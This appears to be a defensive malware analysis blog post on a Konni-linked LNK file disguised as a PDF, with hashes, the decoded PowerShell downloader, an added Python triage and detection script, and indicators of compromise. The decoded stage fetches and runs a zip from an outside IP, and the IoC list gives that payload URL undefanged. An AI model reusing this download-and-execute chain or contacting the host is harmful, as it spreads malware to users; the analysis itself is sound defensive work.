Malware from the North Korean hacking group Konni: integration.pdf.lnk (2024.8.22)
Today, once again without any "great and beloved" reverence, we look at integration.pdf.lnk (2024.8.22), a piece of malware made by the North Korean hacking group Konni. Konni was first identified by Cisco Talos researchers in 2017 and had been carrying out highly targeted attacks undetected since 2014. It is tied to the North Korean hacking groups Thallium and APT37, may well be Kimsuky itself, and is, naturally, one of the lackey hacking units sitting under North Korea's Reconnaissance General Bureau.
Malware hashes
File name: integration.pdf.lnk
Size: 122 KB
MD5: ffde299028d48cb2258d274f44d56766
SHA-1: 678fe2a8a01339138194a70763d69d18d2772beb
SHA-256: 3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
Opening the malicious LNK file shows the following, with the command stored as Base64:
StringD(a)ta
{
namestring: PDF View
relativepath: ..\..\Windows\System32\cmd(.)exe
workingdir: C:\Users\User\Desktop
commandlinearguments: /c powe(r)shell -WindowStyle Hidden -Command "
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String('JGFw(c)GR(h)dGEgP(S)BbU3lzdGVtLkVudmlyb25tZW50XTo6(R)2V0Rm9s
ZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR(1)cmw(g)PSAn(a)HR0cDovLzIuN
Tgu(N)TYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDg
xZi56(a)XAiOyBJbn(Z)va2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJH
ppcFBhdGg7IEFkZC1UeXBlIC1B(c)3Nl(b)WJseU5hb(W)UgU3lzdGVtLklPLkNvbXByZ
XNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJl(c)3Npb24(u)WmlwR(m)lsZV
06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCw(g)JGFwcGRhdGEpOyAkYXV(0)b2l0U
GF0aCA9ICIkY(X)BwZGF0(Y)VxBdXRvSXQzLmV4ZSI7ICRzY(3)JpcHRQYXRoID0gIiRhcH
Bk(Y)XRhXHNjcmlwdC5(h)M3gi(O)yBTdGFydC1Qcm(9)jZXNzIC1GaWxlUGF0aCAkYXV0b
2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3J(p)cHRQYXRoOyBSZW1vdmUtSXRlbSAtUG(F)0
aCAkemlwUGF0aA0K')) | Invoke-Expression"
iconlocation: .\Document(.)pdf
}
Decoding the Base64 portion gives the following result:
$appdata = [System.Environment]::GetFolderPath('ApplicationData');
$url = 'hxxp://2(.)58(.)56(.)124/API481f(.)zip';
$zipPath = "$appdata\API481f(.)zip";
Invoke-WebRequest -Uri $url -OutFile $zipPath;
Add-Type -AssemblyName System(.)IO.Compression.FileSystem;
[System.IO(.)Compression.ZipFile]::ExtractToDirectory($zipPath, $appdata);
$autoitPath = "$appdata\AutoIt3(.)exe";
$scriptPath = "$appdata\script(.)a3x";
Start-Process -FilePath $autoitPath -ArgumentList $scriptPath;
Remove-Ite(m) -Path $zipPath
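The decode step the post walks through by hand, written up as an added triage script. This is example code added here, not from the original post and not part of the Konni sample: it pulls the Base64 blob out of an LNK's CommandLineArguments, decodes it (UTF-8 for the inline FromBase64String pattern shown above; UTF-16LE for the -EncodedCommand form, which this sample does not use and is included as a generalization), flags the behaviours the decoded stage exhibits, checks for a double-extension file name like integration.pdf.lnk, and reports URLs defanged in the hxxp / (.) style the post uses. The command line and script it runs against are constructed stand-ins with a placeholder host (example.invalid); the real blob and IP from the post are deliberately not embedded.

```python
import base64
import re

# Constructed stand-in for the decoded PowerShell stage. It mirrors the structure of the
# downloader described in the post but uses a placeholder host (example.invalid), so this
# file neither embeds nor contacts the real infrastructure.
SAMPLE_SCRIPT = (
    "$appdata = [System.Environment]::GetFolderPath('ApplicationData'); "
    "$url = 'http://example.invalid/SAMPLE.zip'; "
    '$zipPath = "$appdata\\SAMPLE.zip"; '
    "Invoke-WebRequest -Uri $url -OutFile $zipPath; "
    "Add-Type -AssemblyName System.IO.Compression.FileSystem; "
    "[System.IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $appdata); "
    '$autoitPath = "$appdata\\AutoIt3.exe"; $scriptPath = "$appdata\\script.a3x"; '
    "Start-Process -FilePath $autoitPath -ArgumentList $scriptPath; "
    "Remove-Item -Path $zipPath"
)

# Constructed CommandLineArguments value in the same shape as the LNK StringData block,
# as an LNK parser would hand it to an analyst.
SAMPLE_CMDLINE = (
    '/c powershell -WindowStyle Hidden -Command "'
    "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('"
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")
    + "')) | Invoke-Expression\""
)

# Inline FromBase64String('...') blobs (UTF-8 text, as in this sample); the character class
# allows whitespace because dumps often wrap the blob across lines.
B64_INLINE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)")
# powershell -e / -enc / -EncodedCommand blobs, which PowerShell decodes as UTF-16LE.
B64_ENC_FLAG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"<>;]+")
# A document extension immediately followed by .lnk: the icon/name disguise seen here.
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp|txt|jpe?g|png)\.lnk$", re.I)

# Behaviours worth flagging in a decoded stage, with the reason each one matters.
INDICATORS = {
    "-WindowStyle Hidden": "console window hidden from the user",
    "FromBase64String": "inline Base64-encoded stage",
    "Invoke-Expression": "decoded text executed as code",
    "Invoke-WebRequest": "downloads a remote payload",
    "ExtractToDirectory": "unpacks an archive at runtime",
    "Start-Process": "launches a dropped executable",
    "AutoIt3.exe": "AutoIt interpreter used to run a dropped script",
    "Remove-Item": "deletes the dropped archive (cleanup)",
}


def decode_powershell_stages(cmdline: str) -> list:
    """Return every Base64 stage found in a command line, decoded to text."""
    stages = []
    for blob in B64_INLINE.findall(cmdline):
        raw = base64.b64decode(re.sub(r"\s+", "", blob))
        stages.append(raw.decode("utf-8", errors="replace"))
    for blob in B64_ENC_FLAG.findall(cmdline):
        raw = base64.b64decode(blob)
        stages.append(raw.decode("utf-16-le", errors="replace"))
    return stages


def triage(cmdline: str) -> dict:
    """Decode the stages, then collect behaviour indicators and URLs across all layers."""
    stages = decode_powershell_stages(cmdline)
    text = "\n".join([cmdline, *stages]).lower()
    hits = {k: v for k, v in INDICATORS.items() if k.lower() in text}
    urls = sorted(set(URL_RE.findall("\n".join([cmdline, *stages]))))
    return {"stages": stages, "indicators": hits, "urls": urls, "score": len(hits)}


def looks_like_disguised_lnk(filename: str) -> bool:
    """True for names such as integration.pdf.lnk that pose as a document."""
    return DOUBLE_EXT_RE.search(filename) is not None


def defang_url(url: str) -> str:
    """Render a URL in the hxxp:// and (.) style so it cannot be clicked or auto-linked."""
    return url.replace("http", "hxxp", 1).replace(".", "(.)")


if __name__ == "__main__":
    print("disguised name:", looks_like_disguised_lnk("integration.pdf.lnk"))
    report = triage(SAMPLE_CMDLINE)
    for stage in report["stages"]:
        print("decoded stage:", stage)
    for name, why in report["indicators"].items():
        print(f"  [{name}] {why}")
    for url in report["urls"]:
        print("  url:", defang_url(url))
    print("score:", report["score"])
```

Feeding the real CommandLineArguments string from an LNK parser into triage() in place of SAMPLE_CMDLINE reproduces the decode shown above; the indicator list is a starting point for a detection rule on LNK-spawned powershell.exe with -WindowStyle Hidden and FromBase64String in its arguments.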
PDF contents
Steps to using our system:
When you register you get a username and password. That will allow you to log in to the
website among other things.
When using the API please follow the link:
hxxps://api(.)publicleads(.)net/partners/v1/login?username={{$UserName}}&password={{$Password}}
If all …
IoC
2.58.56.124
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
678fe2a8a01339138194a70763d69d18d2772beb
ffde299028d48cb2258d274f44d56766
http://2.58.56.124/API481f.zip